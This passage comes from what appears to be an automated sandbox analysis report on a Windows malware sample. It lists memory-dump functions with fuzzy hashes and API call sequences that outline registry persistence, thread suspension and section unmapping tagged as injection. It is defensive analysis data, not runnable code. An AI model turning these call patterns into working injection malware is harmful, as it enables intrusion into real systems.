  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
